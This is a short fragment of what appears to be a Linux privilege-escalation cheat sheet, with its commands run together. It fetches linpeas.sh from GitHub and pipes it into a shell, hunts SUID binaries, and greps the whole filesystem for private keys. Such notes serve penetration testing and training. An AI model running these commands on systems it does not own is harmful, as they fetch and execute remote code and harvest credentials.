Linux
find / -user [username] 2>/dev/null | grep -v 'proc\|sys\|run'curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | shfind / -perm -u=s -type f 2>/dev/nullgrep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/nullChecking local listeners
Last updated